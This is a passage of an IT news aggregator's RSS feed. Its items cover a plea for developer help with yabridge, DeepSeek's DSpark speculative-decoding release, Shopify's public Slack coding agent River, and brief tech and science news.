<guid isPermaLink="true">https://tsecurity.de/de/3634380/linux-tipps/this-foss-project-needs-some-love/</guid>
<pubDate>Tue, 30 Jun 2026 04:08:41 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>We all know how Wine and Proton made huge progress. It's incredible how Windows games and programs can run on Linux aswell or even better.</p> <p>Although there are some programs that lack of support. There is something kinda magic for music production, called yabridge that needs developers help.</p> <p>Basically Wine after version 9.21 (i think) changed something and yabridge (is a layer for audio plungins) doesn't works as it should with newer versions.</p> <p>There are issues and the one man dev doesn't have all the time needed, as far as i understand it's also quite difficult to do what it's needed.</p> <p>I'm not related to that project, i'm just a person that use it, and being this project something that made my Linux switch possible i think it's very important to give some help.</p> <p>I'm not a dev, i produce music, but maybe some of you are and can help this project to sort issues out.</p> <p>That's a post about it <a href="https://github.com/robbert-vdh/yabridge/issues/457">https://github.com/robbert-vdh/yabridge/issues/457</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/frankiesmusic"> /u/frankiesmusic </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uixmnq/this_foss_project_needs_some_love/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uixmnq/this_foss_project_needs_some_love/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepSeek open sources DSpark, a new framework to speed up LLM inference by up to 85%]]></title>
<description><![CDATA[Even as the geopolitical conversation around AI continues to grow more fraught following the U.S. government's actions to limit the new models from Anthropic and OpenAI, Chinese open source darling DeepSeek is back with yet another open release that could once again change AI development around t...]]></description>
<link>https://tsecurity.de/de/3634171/it-nachrichten/deepseek-open-sources-dspark-a-new-framework-to-speed-up-llm-inference-by-up-to-85/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634171/it-nachrichten/deepseek-open-sources-dspark-a-new-framework-to-speed-up-llm-inference-by-up-to-85/</guid>
<pubDate>Tue, 30 Jun 2026 00:17:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Even as the geopolitical conversation around AI continues to grow more fraught following the<a href="https://venturebeat.com/technology/anthropic-blocks-all-public-access-to-claude-fable-5-mythos-5-following-us-government-order-what-enterprises-should-do"> U.S. government's actions to limit the new models from Anthropic</a> and <a href="https://venturebeat.com/technology/openai-unveils-gpt-5-6-sol-terra-and-luna-models-but-only-accessible-to-limited-preview-partners-for-now-per-us-gov">OpenAI</a>, Chinese open source darling DeepSeek is back with yet another open release that could once again change AI development around the globe. </p><p>Over the weekend, the firm released <a href="https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro-DSpark">DSpark</a>, a new, MIT-Licensed system designed to make large language models answer faster without changing what the underlying model is trying to say. </p><p>The easiest way to think about it is this: most AI chatbots write like someone crossing a river one stepping stone at a time. They choose one small chunk of text, then the next, then the next. </p><p>DSpark gives the system a scout that runs a few steps ahead, guesses the likely path, and lets the larger model quickly check which steps are safe. When the guesses are good, the model moves faster. When the guesses are weak, DSpark tries not to waste time checking them.</p><p>DeepSeek published the work with a <a href="https://github.com/deepseek-ai/DeepSpec/blob/main/DSpark_paper.pdf">technical paper</a>, model checkpoints and <a href="https://github.com/deepseek-ai/DeepSpec">DeepSpec</a>, a codebase for training and evaluating speculative decoding systems. The release is available through DeepSeek’s public <a href="https://github.com/deepseek-ai">GitHub</a> and <a href="https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro-DSpark">Hugging Face </a>pages, both under the permissive, friendly, commonplace MIT license, making the new technique broadly usable by developers, researchers and commercial enterprise operations that want to study or adapt the approach.</p><p>The system is aimed at one of the most expensive problems in AI deployment: serving large models quickly enough for real users, while using hardware efficiently enough to make the economics work. That matters for consumer chatbots, coding assistants, agentic workflows and enterprise AI systems where users expect long answers to stream quickly rather than crawl out word by word.</p><p>DeepSeek is applying DSpark to its own latest frontier open model,<a href="https://venturebeat.com/technology/deepseek-v4-arrives-with-near-state-of-the-art-intelligence-at-1-6th-the-cost-of-opus-4-7-gpt-5-5"> DeepSeek-V4</a>. </p><p>Specifically, DeepSeek used its new DSpark framework on DeepSeek-V4-Flash, its already speed-optimized 284-billion-parameter mixture-of-experts model with 13 billion active parameters, and DeepSeek-V4-Pro, its more thoughtful and powerful 1.6-trillion-parameter model with 49 billion active parameters (Both support context windows up to one million tokens). </p><p>But the broader significance is that<i> DSpark is not conceptually limited to DeepSeek-V4.</i> DeepSeek’s own tests and released checkpoints cover other open model families, including Alibaba's open weights <i>Qwen</i> and Google's open weights <i>Gemma. </i></p><p>That means enterprise teams running open-weight models could, in principle, train or fine-tune DSpark-style draft modules for their own target models. It is not a switch that any API customer can flip from the outside, but it is a method that can travel to other models when the operator controls the weights and serving stack.</p><h2><b>Staggering speed increases for generating tokens during inference</b></h2><p>In DeepSeek’s live production tests, DSpark improved aggregate throughput by 51% for DeepSeek-V4-Flash at an 80-token-per-second-per-user service target, and by 52% for DeepSeek-V4-Pro at a 35-token-per-second-per-user target. At matched system capacity, DeepSeek reports per-user generation speedups of 60% to 85% for V4-Flash and 57% to 78% for V4-Pro over its prior MTP-1 production baseline.</p><p>The different speed claims measure different things. The 60% to 85% figure for V4-Flash, and the 57% to 78% figure for V4-Pro, describe how much faster individual users receive generated tokens when DeepSeek compares DSpark with MTP-1 at matched practical system capacity. </p><p>Those are the cleaner “generation speed” numbers. DeepSeek also reports much larger 661% and 406% increases, but these measure aggregate throughput under very strict speed targets: 120 tokens per second per user for V4-Flash and 50 tokens per second per user for V4-Pro. </p><p>At those targets, DeepSeek says its older MTP-1 baseline approaches an operational cliff, meaning it can keep only a small number of concurrent requests running while preserving that level of responsiveness. </p><p>DSpark avoids more of that collapse, so the percentage difference in total system output becomes much larger. Put simply: the 85% number is closer to “how much faster the ride feels for a user” under comparable conditions, while the 661% and 406% figures are closer to “how much more traffic the road can still carry” when the old system is already bottlenecking. </p><h2><b>Why speculative decoding matters</b></h2><p>LLMs usually generate text one token at a time. A token can be a word, part of a word, punctuation mark or other small piece of text. Every new token depends on the text already produced, so the model has to keep pausing, checking the full context and choosing the next piece.</p><p>That is accurate, but slow. It is like having a senior editor approve every word before a writer can move to the next one. The editor may be excellent, but the process creates a bottleneck.</p><p>Speculative decoding, developed in the early Transfomer era, tries to fix that bottleneck. Instead of asking the large model to produce every token one by one, the system uses a smaller or lighter draft component to suggest several likely next tokens. The large model then checks that batch of guesses in parallel. If the draft guessed correctly, the system moves ahead several tokens at once. If the draft made a bad guess, the system rejects the bad token and anything after it, adds a corrected token, and tries again.</p><p>The point is speed without changing the larger model’s intended output. In the standard speculative decoding setup, the draft model is not replacing the target model. It is acting more like an assistant who prepares a rough next sentence for the senior editor to approve or reject.</p><p>The idea did not appear out of nowhere with today’s large language models. A <a href="https://arxiv.org/abs/1811.03115">key precursor came in 2018</a>, when Mitchell Stern, Noam Shazeer and Jakob Uszkoreit proposed blockwise parallel decoding for deep autoregressive models. Their method predicted multiple future steps in parallel, then kept the longest prefix validated by the main model. That paper established much of the draft-and-check intuition behind later speculative decoding work.</p><p>The research line became more explicit in 2022. <a href="https://arxiv.org/abs/2203.16487">Heming Xia, Tao Ge and co-authors introduced SpecDec</a>, a draft-and-verify approach for sequence-to-sequence generation. Later that year, Yaniv Leviathan, Matan Kalman and Yossi Matias posted “<a href="https://arxiv.org/abs/2211.17192">Fast Inference from Transformers via Speculative Decoding</a>,” which helped define the modern version of the technique for transformer-based language models. DeepMind researchers followed in 2023 with a closely related method called <a href="https://arxiv.org/abs/2302.01318">speculative sampling.</a></p><p>Those 2022 and 2023 papers are the clearest ancestors of how speculative decoding is discussed in current LLM inference work: a faster draft process proposes tokens, and the larger target model verifies them in a way designed to preserve the target model’s output distribution. </p><p>Since then, the field has moved quickly through several variants, including separate draft models, multi-token prediction heads, tree-based verification, feature-level methods such as <a href="https://arxiv.org/abs/2401.15077">EAGLE</a>, self-speculation, Medusa-style extra heads and parallel/blockwise drafters such as DFlash.</p><p>The key metric is not how many tokens a draft model can guess. It is how many of those guesses the larger model actually accepts. Long speculative blocks help only if enough of the proposed tokens survive verification. Otherwise, the system spends compute checking guesses that it throws away.</p><p>That is the context for DSpark. Speculative decoding is already an established inference technique before DeepSeek’s release, with support in major serving stacks and multiple competing research approaches. But it is still not a solved problem. Speedups depend heavily on the draft model, the workload, the serving setup and the current traffic level. DSpark’s contribution is to improve both sides of the trade-off: it tries to draft more coherent token blocks and then verify only the parts of those blocks that are likely to pay off under real serving conditions.</p><h2><b>What DSpark changes</b></h2><p>DSpark tackles two related problems: bad guesses and wasted checking.</p><p>First, the system uses what DeepSeek calls semi-autoregressive generation. In plain English, that means DSpark tries to combine speed with a bit more awareness of sequence. </p><p>A fully parallel drafter can guess several tokens at once, which is fast, but its later guesses can become less coherent because each position is predicted too independently. A purely step-by-step drafter can keep better track of how one token leads to the next, but it loses much of the speed advantage.</p><p>DSpark tries to keep the best of both. It uses a parallel backbone for most of the drafting work, then adds a lightweight sequential head that lets the draft take nearby token relationships into account. In the paper’s example, a parallel drafter might confuse likely phrase endings such as “of course” and “no problem,” producing awkward combinations because it is guessing positions too separately. DSpark’s sequential component helps the system make the later tokens fit the earlier ones.</p><p>Second, DSpark adds confidence-scheduled verification. Rather than always asking the target model to check the same number of draft tokens, DSpark estimates which prefix of the draft is likely to survive. A hardware-aware scheduler then adjusts how much of each draft should be verified based on both model confidence and current serving load.</p><p>A simple analogy: when a restaurant is quiet, the head chef can inspect more of the prep cook’s work. When the kitchen is slammed, the chef spends attention only on the dishes most likely to be ready. DSpark applies a similar idea to AI serving. Under lighter traffic, the system can afford to check longer draft prefixes. Under heavier traffic, it trims low-confidence trailing guesses before they consume batch capacity that could be used for other users.</p><p>DeepSeek frames this as an answer to a common production trade-off. Static multi-token drafting can look attractive in isolation, but can hurt throughput under high concurrency because the system keeps checking tokens that are likely to be rejected. DSpark’s scheduler makes the verification budget flexible instead of fixed.</p><h2><b>Offline results: better draft acceptance across Qwen and Gemma</b></h2><p>DeepSeek tested DSpark offline on Qwen3-4B, Qwen3-8B, Qwen3-14B and Gemma4-12B target models across math, coding and chat benchmarks. </p><p>In those tests, the team compared DSpark with DFlash, a parallel drafter, and Eagle3, an autoregressive drafter. The paper reports accepted length per decoding round, a measure of how many tokens survive verification on average.</p><p>Across the three Qwen3 model sizes, DSpark improved macro-average accepted length over Eagle3 by 30.9%, 26.7% and 30.0%, respectively. Compared with DFlash, it improved accepted length by 16.3%, 18.4% and 18.3%. The paper also says the gains generalized to Gemma4-12B.</p><p>That supports a point raised by developer Daniel Han, who highlighted on X that DeepSeek showed DSpark working beyond DeepSeek’s own V4 models, including Gemma and Qwen. I would include Han as community reaction, not as the sole evidence for the claim. The stronger support comes from DeepSeek’s own benchmarks and released checkpoints.</p><p>The offline results also show why workload matters. Structured tasks such as math and code tend to have higher accepted lengths than open-ended chat. That makes intuitive sense: a code completion or math step often has fewer reasonable next moves than a free-form conversation. </p><p><b>For enterprises, </b>this means<b> DSpark-style methods may be especially attractive for coding assistants, data analysis agents, structured workflow automation</b> and other settings where outputs follow more predictable patterns.</p><h2><b>How enterprises could use DSpark without DeepSeek-V4</b></h2><p>One of the most important questions is whether DSpark is a DeepSeek-only optimization or a broader method that can be applied to other models. The answer is: broader method, but not automatic plug-in.</p><p>For open-weight models, the path is relatively clear. An enterprise running Qwen, Gemma, Llama, Mistral, Granite, Command-style open weights or another model it hosts itself could train or fine-tune a DSpark-style draft module against that target model. </p><p>The team would then measure acceptance on its own workloads and integrate the verification scheduler into its inference stack.</p><p>That is different from simply downloading DeepSeek’s DSpark module and attaching it to any model. Speculative decoding depends on alignment between the draft module and the target model. The draft has to learn what the target model is likely to accept. A drafter trained for DeepSeek-V4 will not automatically be the right drafter for a different model, especially one fine-tuned on a company’s internal data or configured for different reasoning behavior.</p><p>DeepSpec’s workflow reflects this. The process involves preparing data, regenerating target-model answers, building a target cache, training the draft model and evaluating speculative-decoding acceptance. For domain-specific use, the draft model may need additional fine-tuning, especially if the target model runs in a thinking or reasoning mode.</p><p>For proprietary models, the answer depends on what the enterprise controls. If a company owns or fully hosts the model weights and serving stack, it could theoretically train and deploy a DSpark-style drafter. If the model is available only through a hosted API from a vendor, the customer cannot directly add DSpark from the outside. The API provider could implement a similar optimization internally, but the customer generally cannot access the token verification loop, logits, batching behavior or serving scheduler needed to make DSpark work.</p><p>That distinction matters for enterprise buyers. DSpark strengthens the case for open or self-hosted AI infrastructure because it gives advanced teams another lever to improve speed and cost. But it also shows why model serving is becoming a specialized discipline. The value is not just in picking a model, but in how intelligently that model is run.</p><h2><b>What developers get from DeepSpec</b></h2><p>For developers, DeepSpec gives a concrete implementation path for training and evaluating speculative decoding draft models. It includes data preparation, training and benchmark evaluation steps, along with released checkpoints for several open model families. That makes the release useful not only for running DeepSeek-V4 with DSpark, but also for researchers and infrastructure teams studying how to add faster decoding to other open models.</p><p>There are real deployment caveats. DeepSpec’s own README says the default Qwen3-4B data preparation setup can require roughly 38 TB of target cache storage, and the default scripts assume a single node with eight GPUs. That makes the release more immediately relevant to AI labs, cloud teams and sophisticated enterprise AI infrastructure groups than to ordinary application developers.</p><p>Still, releasing the training pipeline matters. Many inference optimizations appear only as papers, vague benchmarks or closed production claims. DeepSpec gives developers something closer to a set of blueprints: not a finished enterprise product, but a way to reproduce, adapt and evaluate the method.</p><h2><b>Early community testing</b></h2><p>The release has already drawn fast developer attention. Developer <a href="https://github.com/rafaelcaricio/spark_vllm_docker/pull/1">Rafael Caricio published a GitHub pull request </a>documenting single-stream DeepSeek-V4-Flash DSpark work, reporting warmed benchmark anchors of 26.33 tokens per second without speculative decoding, 39.88 tokens per second with MTP-1, and roughly 60 tokens per second with DSpark — about 1.5x over MTP-1 and 2.3x over no-spec decoding.</p><p>A later commit in the same thread recorded a five-run mean of 60.31 tokens per second, with a 1.51x gain over MTP-1 and 2.29x over non-speculative decoding. </p><p>The same work also points to an important practical limit: in realistic multi-turn coding sessions, performance can degrade as draft acceptance falls with growing context. In other words, DSpark can make decoding faster, but acceptance quality still determines how much speed the system actually realizes.</p><p>That is a useful reality check. DSpark is not magic. It still depends on how predictable the next tokens are and how well the drafter stays aligned with the target model. But the early implementation work suggests DeepSeek’s claims are not purely academic. Developers are already testing the method in practical serving environments and reporting gains close to the paper’s single-stream expectations.</p><h2><b>The bottom line</b></h2><p>DSpark shows how much performance remains available in the inference layer, even when the underlying model architecture stays the same. As AI companies compete on model quality, context length and pricing, decoding efficiency is becoming another major battleground. </p><p>Faster generation means lower latency for users, higher throughput for providers and better economics for teams serving open models at scale.</p><p>DeepSeek’s release is notable because it combines a production-tested method, open code, public checkpoints and a detailed paper. The main innovation is not just drafting more tokens. It is making the system more selective about which speculative work is worth verifying.</p><p>For enterprise teams, the broader lesson is that the next wave of AI performance gains will not come only from larger models. It will also come from smarter ways to run the models companies already have — especially when those companies control enough of the stack to tune the model, train a compatible draft module and optimize the serving engine around real workloads.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DIY Steam Machine gaming PCs are cropping up — can 3D-printed cases and RTX 5060s actually recreate Valve's magic?]]></title>
<description><![CDATA[An AMD engineer and PC enthusiast built his own custom Steam Machine with an RTX 5060 inside. I highly doubt it's the last project of this sort we'll see, but the creator notes this sort of thing isn't all it's cracked up to be.]]></description>
<link>https://tsecurity.de/de/3633406/windows-tipps/diy-steam-machine-gaming-pcs-are-cropping-up-can-3d-printed-cases-and-rtx-5060s-actually-recreate-valves-magic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633406/windows-tipps/diy-steam-machine-gaming-pcs-are-cropping-up-can-3d-printed-cases-and-rtx-5060s-actually-recreate-valves-magic/</guid>
<pubDate>Mon, 29 Jun 2026 17:58:21 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An AMD engineer and PC enthusiast built his own custom Steam Machine with an RTX 5060 inside. I highly doubt it's the last project of this sort we'll see, but the creator notes this sort of thing isn't all it's cracked up to be.]]></content:encoded>
</item>
<item>
<title><![CDATA[When software developers and AI agents share the learning]]></title>
<description><![CDATA[Before Tobi Lütke ran Shopify, he learned programming through Germany’s apprenticeship system⁠, the way people have learned trades forever: in a shared workshop, watching people who already knew what they were doing. More recently, describing Shopify’s River, he reached for a related word: Lehrwe...]]></description>
<link>https://tsecurity.de/de/3632384/ai-nachrichten/when-software-developers-and-ai-agents-share-the-learning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632384/ai-nachrichten/when-software-developers-and-ai-agents-share-the-learning/</guid>
<pubDate>Mon, 29 Jun 2026 11:04:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Before Tobi Lütke ran Shopify, he <a href="https://tobi.lutke.com/blogs/news/11280301-the-apprentice-programmer">learned programming</a> through Germany’s apprenticeship system⁠, the way people have learned trades forever: in a shared workshop, watching people who already knew what they were doing. More recently, <a href="https://x.com/tobi/status/2053121182044451016">describing Shopify’s River</a>, he reached for a related word: <em>Lehrwerkstatt</em>⁠, a teaching workshop where “the whole shop floor is the classroom.”</p>



<p>X has been agog by the numbers around <a href="https://shopify.engineering/under-the-river">River</a>⁠, Shopify’s Slack-native <a href="https://www.infoworld.com/article/3611465/how-ai-agents-will-transform-the-future-of-work.html">AI agent</a>. In total, 5,938 Shopify employees worked with River across 4,450 different Slack channels, and River now coauthors roughly one in eight merged pull requests across the company. It’s a big deal, but understanding <em>why</em> it works that way is the most important part.</p>



<p>River can read code, run tests, open pull requests, query the data warehouse, inspect production traces, and sometimes push back on a plan it thinks is bad. Great. Lots of companies will have clever coding agents someday soon. Some already do.</p>



<p>The interesting part is that River doesn’t work alone; it works where everyone can see it.</p>



<h2 class="wp-block-heading"><a></a>Betting on the workshop</h2>



<p>I’ve already <a href="https://www.infoworld.com/article/4142019/coding-for-agents.html">argued that agents reward explicit, consistent, well-documented software</a>. They like the “boring” stuff, such as schemas, tests, conventions, clean setup instructions, and codebases that don’t require a deep retrospective with the one engineer who remembers why the build script has to run twice. Dropping an agent into a messy repo is mostly an efficient audit of your engineering discipline. Agents hold up a mirror to our engineering practices.</p>



<p>This is where Shopify comes off looking good. Without all the engineering pre-work, River wouldn’t be a success. In early 2024⁠, the company says it had many repositories, bespoke development environments, and slow feedback loops. It then made two unpopular but critically important choices: moved to a monorepo called World and built dev environments, continuous integration, and production images on <a href="https://shopify.engineering/what-is-nix" data-type="link" data-id="https://shopify.engineering/what-is-nix">Nix</a> as one reproducible substrate.</p>



<p>Shopify recognized that “code is going to be increasingly written with AI, and our infrastructure needs to be the substrate for that.” But the company did more than insist on legible code: It started to create shared memory of that code across the company.</p>



<h2 class="wp-block-heading"><a></a>Collective coding</h2>



<p>River has one design constraint that every enterprise architect should pay attention to: It only works in public Slack channels. No direct messages. No private groups. You summon River where other people can watch, join, search, and learn. That sounds like a small product choice, but it’s not. It’s the operating model, kind of like open sourcing code development within Slack.</p>



<p>Because of this design constraint, every River session becomes a visible transcript. Shopify can then mine those transcripts, see recurring patterns, and feed them back into River’s skills, prompts, and defaults. One engineer’s hard-won fix at two o’clock becomes the next engineer’s starting point at four o’clock. The model doesn’t need to be retrained for the company to get smarter, and developers don’t need to go out of their way to document things. The work just has to leave a trace.</p>



<p>That’s the <em>Lehrwerkstatt</em>, productized. Everyone gets to watch the agent work.</p>



<p>Now compare that with how most enterprises are deploying AI. One developer works with a private chatbot in a private IDE in a private window that no one else will ever see. Multiply that by a few thousand. Each person discovers a clever way to investigate a flaky test, explain a troublesome service boundary, or avoid a migration trap. Then the session closes, and the discovery dies. Sure, the developer may go faster, but the company is no better off than it was yesterday.</p>



<h2 class="wp-block-heading"><a></a>The transcript is the artifact</h2>



<p>One mistake enterprises have made with knowledge management is treating documentation as something people write <em>after</em> the work. This rarely works. Few employees (developers or otherwise) want to undertake the tedium of documenting what they already did. Not unless someone is paying them to do it.</p>



<p>River suggests a better pattern: The work itself creates the documentation.</p>



<p>Not every transcript is useful, of course. Most probably aren’t. But the useful ones can become skills, defaults, examples, runbooks, repo instructions, or links that help the next person avoid starting from zero. Shopify says River sessions are searchable and reproducible, and the company feeds patterns from those sessions back into River’s skills, prompts, and defaults. That’s not a chatbot; it’s a learning loop.</p>



<p>This is where the usual “AI will make developers more productive” framing feels too small. The more interesting claim is that AI can make software organizations more teachable. However, this won’t happen by default. The shop floor needs to be institutionalized or the enterprise will remain an atomized collection of productivity silos.</p>



<h2 class="wp-block-heading">A magic memory file</h2>



<p>This is where <code><a href="https://agents.md/">agents.md</a>⁠</code> is useful, but only if properly used. <code>agents.md</code> describes itself as a README for agents and says it’s now used by more than 60,000 open source projects. How should a developer use it? GitHub, based on<a href="https://github.blog/ai-and-ml/github-copilot/how-to-write-a-great-agents-md-lessons-from-over-2500-repositories/"> analysis of more than 2,500 repositories</a>⁠, gives some clear guidance: Put commands early, be specific, provide real examples, and set explicit boundaries.</p>



<p>In other words, write down what matters.</p>



<p>But don’t mistake the file for the capability. ETH Zurich researchers recently<a href="https://arxiv.org/abs/2602.11988"> </a><a href="https://arxiv.org/abs/2602.11988">tested whether repository-level context files actually help coding agents</a>⁠ and found that they often reduce task success while increasing inference cost by more than 20%. InfoQ <a href="https://www.infoq.com/news/2026/03/agents-context-file-value-review/">summarized⁠</a> their finding this way: LLM-generated context files often hurt, and human-written ones should focus on non-inferable details, such as custom tools, unusual build commands, and highly specific project constraints.</p>



<p>That’s the enterprise opportunity.</p>



<p>Public GitHub projects often don’t have much non-inferable domain knowledge to encode, but enterprise software is filled with it: odd quirks such as why the pricing service can’t be called during checkout in a certain region, or which legacy API looks dead but still supports a major customer, or why the data model says one thing but revenue recognition says another. Etc., etc.</p>



<p>That’s the context worth preserving, rather than directory maps an agent can discover or generic coding preferences. That’s what the shop-floor version of <code>agents.md</code> looks like: Not a static file that someone auto-generates and forgets, but rather the residue of observed work. Agents struggle, humans correct, patterns emerge, and only the durable lessons become instructions.</p>



<h2 class="wp-block-heading"><a></a>You’re not Shopify</h2>



<p>If all this sounds great (and it should), then it’s worth a word of warning: You probably won’t be able to copy Shopify, any more than you could have (or should have) <a href="https://www.infoworld.com/article/2260708/no-you-dont-have-to-run-like-google.html">copied Google</a>. You’re not Shopify. Most companies shouldn’t wake up Monday and announce a monorepo migration, a Nix conversion, and a Slack-only agent because River sounds cool. That approach has worked for Shopify, but it doesn’t mean it will work for you.</p>



<p>The useful approach for any company that isn’t Shopify is to ask different questions: Where does <a href="https://www.infoworld.com/article/3812583/what-you-need-to-know-about-developing-ai-agents.html">agent</a> work happen in your company and who learns from it? If the answers are “in private” and “nobody,” you’ve got problems. I’m not saying that every agent session belongs in a public channel. You absolutely should <em>not </em>dump customer data, security incidents, HR issues, or privileged production context into a companywide AI water cooler. Boundaries still matter. In some cases, they matter more because agents can move faster and touch more systems than humans do, <a href="https://www.infoworld.com/article/4021238/why-llms-demand-a-new-approach-to-authorization.html">as I’ve warned</a>.</p>



<p>But the principle survives the caveats: Agent work should be inspectable, reusable, and improvable where appropriate. The organization should be able to see the path from question to tool call to failed attempt to correction to pull request to reusable knowledge.</p>



<h2 class="wp-block-heading"><a></a>Shared learning is the new (old) way</h2>



<p>For years, developer experience mostly meant removing friction for individuals: faster setup, better docs, nicer APIs, etc. Those are all still good. But agentic development adds a new requirement: shared learning.</p>



<p>A great developer experience now needs other things: Can the next developer benefit from the last agent session? Can the agent explain not just what it changed, but what it learned? Can a private breakthrough become a team asset without creating a surveillance nightmare? And no, visibility isn’t surveillance, and the goal is not to grade every keystroke or turn developers into content producers for the corporate memory machine. The goal is to make valuable work observable enough that it compounds.</p>



<p>This is a management problem as much as a tools problem. Developers will use agents because agents help them get work done. At this point, you’d struggle to get them to stop. Still, they won’t voluntarily produce beautiful organizational memory as a side effect unless the workflow makes it natural. You need to make the shared shop floor the golden path, as <a href="https://www.infoworld.com/article/4125409/ai-will-not-save-developer-productivity.html">I’ve applied in various ways for years</a>.</p>



<p>In the River story, humans are still the teachers. The organization is still responsible for deciding what counts as good work. The system still needs judgment, taste, security, cost control, and review. The magic happens when all this work is done in the open where the organization can learn from the teaching.</p>



<p>That’s the real promise of agentic coding inside enterprises. Not that every developer gets a private genius, but rather that every developer can tap into collective genius. Lütke learned his trade in a room where the craft was visible, and apprentices learned by watching the work. The companies that win the agent era will rebuild that room for software.</p>



<p>In short, the smartest thing your AI can do isn’t to code faster. It’s to work in public.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scroll Burned in 79 AD Volcanic Eruption Finally Deciphered Using AI]]></title>
<description><![CDATA[When Mt. Vesuvius erupted in 79 A.D., it buried hundreds of papyrus
scrolls. They were rediscovered in the mid-1700s, remembers Smithsonian magazine, "the only
surviving collection of its kind from the Greco-Roman
world..." 



"But when scholars tried to unroll them, the carbonized manuscripts
c...]]></description>
<link>https://tsecurity.de/de/3630131/it-security-nachrichten/scroll-burned-in-79-ad-volcanic-eruption-finally-deciphered-using-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630131/it-security-nachrichten/scroll-burned-in-79-ad-volcanic-eruption-finally-deciphered-using-ai/</guid>
<pubDate>Sat, 27 Jun 2026 21:52:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[When Mt. Vesuvius erupted in 79 A.D., it buried hundreds of papyrus
scrolls. They were rediscovered in the mid-1700s, remembers Smithsonian magazine, "the only
surviving collection of its kind from the Greco-Roman
world..." 



"But when scholars tried to unroll them, the carbonized manuscripts
crumbled to dust."








Every generation that followed faced the same dilemma: They could wait for
technology to advance, abandoning hope of reading the ancient texts
in their own lifetime. Or they could try to open the scrolls
themselves — and risk destroying them. 


In recent years, researchers have settled on a third option. Using
advanced imaging and artificial intelligence, they're deciphering
the scrolls without needing to unroll them at all. 



The Vesuvius Challenge
has accelerated the process by turning it into a public competition,
complete with cash prizes. In 2023, a student won $40,000 for
deciphering a
single word — "purple" — from an unopened scroll. Later,
contestants would identify 2,000 Greek characters from one scroll ($700,000) and the title of another ($60,000). Now, for the very first time,
researchers have recovered all
surviving text from a single scroll. The nearly five-foot-long
segment includes roughly 20 columns of ancient Greek philosophy,
accessible for the first time in nearly 2,000 years. 


"The tech actually does look like magic, but it's not," Brent
Seales, a computer scientist at the University of Kentucky, said
at a press
conference. (The article points out that Seales partnered with two Silicon Valley investors in 2023 to launch the Vesuvius Challenge, and is now hailing "the restoration of lost voices from the ancient world."

Seales has been working on virtually unwrapping the
scrolls since the early 2000s. The process involved imaging the
bundles of papyrus using technology similar to CT scanners, isolating
thin layers and then stitching them together.... "We've developed
a systematic and a repeatable approach," Seales told the audience.
"Now it's only a matter of time until we read all of the
scrolls."

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Scroll+Burned+in+79+AD+Volcanic+Eruption+Finally+Deciphered+Using+AI%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F27%2F1825220%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F27%2F1825220%2Fscroll-burned-in-79-ad-volcanic-eruption-finally-deciphered-using-ai%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/06/27/1825220/scroll-burned-in-79-ad-volcanic-eruption-finally-deciphered-using-ai?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Magic Mushrooms gegen Demenz: Spektakuläre Studie wirft Fragen auf]]></title>
<description><![CDATA[Nur eine Dosis Psilocybin – und eine Frau mit schwerem Alzheimer kann wieder sprechen. Auch andere Symptome bessern sich. Wie aussagekräftig sind die Ergebnisse einer Aufsehen erregenden Fallstudie aus Brasilien?
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3630015/it-nachrichten/magic-mushrooms-gegen-demenz-spektakulaere-studie-wirft-fragen-auf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630015/it-nachrichten/magic-mushrooms-gegen-demenz-spektakulaere-studie-wirft-fragen-auf/</guid>
<pubDate>Sat, 27 Jun 2026 20:17:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nur eine Dosis Psilocybin – und eine Frau mit schwerem Alzheimer kann wieder sprechen. Auch andere Symptome bessern sich. Wie aussagekräftig sind die Ergebnisse einer Aufsehen erregenden Fallstudie aus Brasilien?
<a href="https://t3n.de/news/magic-mushrooms-psilocybin-alzheimer-demenz-studie-brasilien-1748978/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hisense is giving parents a magic TV remote that stops kids from seeing inappropriate content — and I wish it had been around when my two were tots]]></title>
<description><![CDATA[Hisense's new Safe Streaming remote connects directly to the kid-safe VIDAA Kids, powered by Kidoodle.tv.]]></description>
